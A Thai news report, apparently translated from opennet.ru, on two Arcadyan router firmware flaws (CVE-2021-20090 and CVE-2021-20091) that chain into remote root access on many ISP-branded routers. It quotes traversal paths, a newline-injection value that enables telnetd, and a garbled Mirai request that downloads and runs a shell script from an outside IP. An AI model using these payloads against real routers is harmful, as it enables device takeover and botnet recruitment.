มีการบันทึกการโจมตีครั้งใหญ่บนเครือข่ายต่อเราเตอร์ภายในบ้านซึ่งเฟิร์มแวร์ใช้การใช้งานเซิร์ฟเวอร์ HTTP จากบริษัท Arcadyan เพื่อให้สามารถควบคุมอุปกรณ์ได้ มีการใช้ช่องโหว่สองรายการร่วมกันที่อนุญาตให้เรียกใช้โค้ดจากระยะไกลด้วยสิทธิ์รูท ปัญหาส่งผลกระทบต่อเราเตอร์ ADSL ที่ค่อนข้างหลากหลายจาก Arcadyan, ASUS และ Buffalo รวมถึงอุปกรณ์ที่จัดหาภายใต้แบรนด์ Beeline (ปัญหาได้รับการยืนยันใน Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone และ ผู้ประกอบการโทรคมนาคมรายอื่น มีข้อสังเกตว่าปัญหาเกิดขึ้นในเฟิร์มแวร์ Arcadyan มานานกว่า 10 ปีและในช่วงเวลานี้สามารถโยกย้ายไปยังอุปกรณ์อย่างน้อย 20 รุ่นจากผู้ผลิต 17 ราย
ช่องโหว่แรก CVE-2021-20090 ทำให้สามารถเข้าถึงสคริปต์เว็บอินเทอร์เฟซโดยไม่ต้องมีการตรวจสอบสิทธิ์ สาระสำคัญของช่องโหว่คือในเว็บอินเตอร์เฟส บางไดเร็กทอรีที่ใช้ส่งรูปภาพ, ไฟล์ CSS และสคริปต์ JavaScript สามารถเข้าถึงได้โดยไม่ต้องมีการตรวจสอบสิทธิ์ ในกรณีนี้ ไดเร็กทอรีที่อนุญาตให้เข้าถึงโดยไม่มีการรับรองความถูกต้องจะถูกตรวจสอบโดยใช้มาสก์เริ่มต้น การระบุอักขระ “../” ในเส้นทางเพื่อไปยังไดเร็กทอรีหลักถูกบล็อกโดยเฟิร์มแวร์ แต่การใช้ชุดค่าผสม “..%2f” จะถูกข้ามไป ดังนั้นจึงเป็นไปได้ที่จะเปิดหน้าที่ป้องกันเมื่อส่งคำขอเช่น “http://192.168.1.1/images/..%2findex.htm”
ช่องโหว่ที่สอง CVE-2021-20091 อนุญาตให้ผู้ใช้ที่ได้รับการรับรองความถูกต้องสามารถทำการเปลี่ยนแปลงการตั้งค่าระบบของอุปกรณ์โดยการส่งพารามิเตอร์ที่จัดรูปแบบพิเศษไปยังสคริปต์ Apply_abstract.cgi ซึ่งไม่ได้ตรวจสอบการมีอยู่ของอักขระขึ้นบรรทัดใหม่ในพารามิเตอร์ . ตัวอย่างเช่น เมื่อดำเนินการปิง ผู้โจมตีสามารถระบุค่า “192.168.1.2%0AARC_SYS_TelnetdEnable=1” ในช่องที่มีการตรวจสอบที่อยู่ IP และสคริปต์เมื่อสร้างไฟล์การตั้งค่า /tmp/etc/config/ .glbcfg จะเขียนบรรทัด “AARC_SYS_TelnetdEnable=1” ลงไป " ซึ่งจะเปิดใช้งานเซิร์ฟเวอร์ telnetd ซึ่งให้การเข้าถึงเชลล์คำสั่งที่ไม่จำกัดด้วยสิทธิ์รูท ในทำนองเดียวกัน โดยการตั้งค่าพารามิเตอร์ AARC_SYS คุณสามารถรันโค้ดใดๆ บนระบบได้ ช่องโหว่แรกทำให้สามารถเรียกใช้สคริปต์ที่มีปัญหาได้โดยไม่ต้องมีการตรวจสอบสิทธิ์โดยการเข้าถึงเป็น “/images/..%2fapply_abstract.cgi”
เพื่อใช้ประโยชน์จากช่องโหว่ ผู้โจมตีจะต้องสามารถส่งคำขอไปยังพอร์ตเครือข่ายที่เว็บอินเทอร์เฟซกำลังทำงานอยู่ เมื่อพิจารณาจากพลวัตของการแพร่กระจายของการโจมตี ผู้ให้บริการจำนวนมากออกจากการเข้าถึงอุปกรณ์ของตนจากเครือข่ายภายนอก เพื่อทำให้การวินิจฉัยปัญหาง่ายขึ้นโดยบริการสนับสนุน หากการเข้าถึงอินเทอร์เฟซถูกจำกัดเฉพาะเครือข่ายภายใน การโจมตีสามารถทำได้จากเครือข่ายภายนอกโดยใช้เทคนิค “DNS rebinding” มีการใช้ช่องโหว่ในการเชื่อมต่อเราเตอร์กับบ็อตเน็ต Mirai อยู่แล้ว: POST /images/..%2fapply_abstract.cgi การเชื่อมต่อ HTTP/1.1: ปิด User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=ซีดี+/tmp; wget+http://212.192.241.72/lolol.sh; ขด+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
ที่มา: opennet.ru